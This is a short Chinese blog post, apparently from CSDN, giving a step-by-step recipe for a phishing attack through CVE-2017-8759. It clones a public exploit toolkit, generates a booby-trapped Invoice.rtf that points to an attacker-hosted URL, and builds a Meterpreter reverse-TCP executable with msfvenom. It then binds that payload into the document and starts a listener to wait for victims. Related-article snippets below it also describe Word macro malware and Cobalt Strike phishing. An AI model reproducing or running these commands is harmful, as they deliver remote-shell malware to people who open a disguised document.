msf宏钓鱼

最新推荐文章于 2023-02-01 15:38:06 发布
最新推荐文章于 2023-02-01 15:38:06 发布
阅读量309 收藏 3
点赞数
文章标签: python shell linux docker git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45382656/article/details/118565076
版权

kali下载python脚本,生成rtf文件:

下载脚本:git clone https://github.com/bhdresh/CVE-2017-8759.git

生成rtf文件:

python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.8.131/logo.txt

0

利用msfvenom生成木马

生成exe:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1133 -f exe > /root/shell.exe

0

捆绑木马:

python cve-2017-8759_toolkit.py -M exp -e http://192.168.8.124/shell.exe -l /root/shell.exe

0

启动监听,等待钓鱼上线

0

0
洋洋cc
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali渗透测试:使用Word病毒进行渗透攻击
Liu_Bruce的博客
05-14 4399
Kali渗透测试:使用病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。病毒在Word中引入之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,病毒利用这一点得到了大范围的传播。 构造一个包含病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 病毒会执行, 然后感染其他文件或
红蓝对抗钓鱼篇之从入门到放弃
xnxqwzy的博客
09-13 170
上一章讲到邮件服务器的搭建和使用,那么这章就具体讲解利用方式。在大型企业边界安全做的越来越好的情况下,不管是 APT 攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多的应用。钓鱼往往需要免杀技术的支撑,但本章只讲述钓鱼和些许免杀技术,免杀系列学习在后续讲解。
[2023最新]Metasploit(MSF)下载安装及使用详解,永久免费使用,环境配置和使用技巧指南
kjuhfkicf154的博客
01-13 5620
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。
MSF利用病毒感染word文档获取shell复现
永远是少年
06-14 2133
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用病毒感染word文档获取shell复现。 一、环境准备 二、文档生成 三、效果检验
红队简单钓鱼实战---office
LvHLong的博客
05-30 1401
前言 本文发布已获得本人授权 ,本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 一、office介绍 是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成,当在工作时,就可以直接利用事先编好的自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。 病毒是一种常见的计算机病毒,......
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
kali 渗透msf
11-14
kali渗透测试利器
msf开发者文档
09-28
此为msf开发文档,项移植应用msf可以阅读。msf采用ruby编写。
ThePayloadGhostv2:生成util msfvenom
03-26
的有效负载幽灵 您必须解压缩Images.zip文件,然后将其移动到Images文件夹中的路径:/ usr / share。 您之前应该已经对该文件夹授予了权限。 如果愿意,可以将tph启动器移动到/ bin或/ usr / bin。 如果不是,请尝试手动下载以下依赖项: Java的: 关键工具: Jarsigner: Metasploit框架: Apktool: 实用程序Linux: Information Options the payload ghost is a program to generate -w WhatsApp msfvenom payloads but with a very curious end -f Face
WAMP下配置https,希望对大家有所帮助.
zel18296430852的博客
06-11 2751
第一步:配置https需要ssl证书,这个证书可以去阿里云或者腾讯云申请,都有一年的免费试用,我用的是腾讯云腾讯云(https://cloud.tencent.com/?fromSource=gwzcw.234976.234976.234976)按照腾讯云上的步骤去做就行.需要在你域名控制台添加一个东西.很简单的,我这里就不截图了,如果不懂可以问我下载证书下载后会得到一个文件夹我配置的是Apach...
CobaltStrike之钓鱼shellcode 实验详细
HAKUNAMATATATTA的博客
02-01 1272
通过该实验了解CS的office钓鱼,端口转发及shellcode生成
CVE-2017-8759复现(word钓鱼
0xdawn的博客
01-23 1305
CVE-2017-8759漏洞复现(word钓鱼) 0x01 虚拟机kali-linux、win7靶机 1.为了方便起见,直接利用GitHub上的一个POC。 git clone https://github.com/bhdresh/CVE-2017-8759.git 2.利用cve-2017-8759_toolkit.py文件生成一个恶意rtf文件。 python cve-20...
纯干货!word钓鱼文件制作教程
A10ng_的博客
10-20 1343
纯干货!word钓鱼文件制作教程 最近各类攻防演练中,蓝队卷的太厉害,导致红队常常好几天打不了一个点,直呼肝不动。这时候常常钓鱼就成为了不二之选,往往能有奇效。下边就教大家怎么去制作一个木马,成功打进内网。 首先我们打开cs。 我们要创建一个监听,打开监听器这一栏,在底下有个Add按钮,点击就能添加监听了。 名字随意,端口不要跟常用的服务撞上就行。 点击攻击这一栏 然后依次点击生成后门——>Ms Office Macro。 点击之后选择好之前创建的...
MSF目录结构
m0_61506558的博客
08-26 823
kali终端中输然后输入 ls 查看。
Kail之MSF渗透测试
weixin_59616219的博客
12-20 812
Kail之MSF渗透测试
nginx配置https服务
热门推荐
silly8543
06-22 1万+
nginx配置https服务
MSF钓鱼渗透攻击原理
最新发布
05-26
MSF(Metasploit Framework)是一款常用的渗透测试工具,它可以通过钓鱼攻击来获取目标计算机的访问权限。 钓鱼攻击原理是利用社交工程学原理,通过发送欺骗性的信息或者伪造网站等方式,诱导目标用户点击链接或者下载文件,从而在其计算机中植入木马或者后门程序。当攻击者获取了目标计算机的访问权限后,就可以利用漏洞或者其他方式获取敏感信息或者控制目标计算机。 MSF钓鱼渗透攻击主要分为以下几个步骤: 1. 伪造欺骗性信息:攻击者利用社交工程学原理,伪造看似真实的邮件、网站等信息,以诱导目标用户点击链接或下载文件。 2. 植入木马或后门程序:一旦目标用户点击链接或下载文件,攻击者就会在其计算机中植入木马或后门程序,从而获取访问权限。 3. 利用漏洞获取敏感信息:攻击者可以利用漏洞或其他方式获取目标计算机中的敏感信息。 4. 控制目标计算机:攻击者可以利用木马或后门程序对目标计算机进行控制,例如远程执行命令、上传下载文件等操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值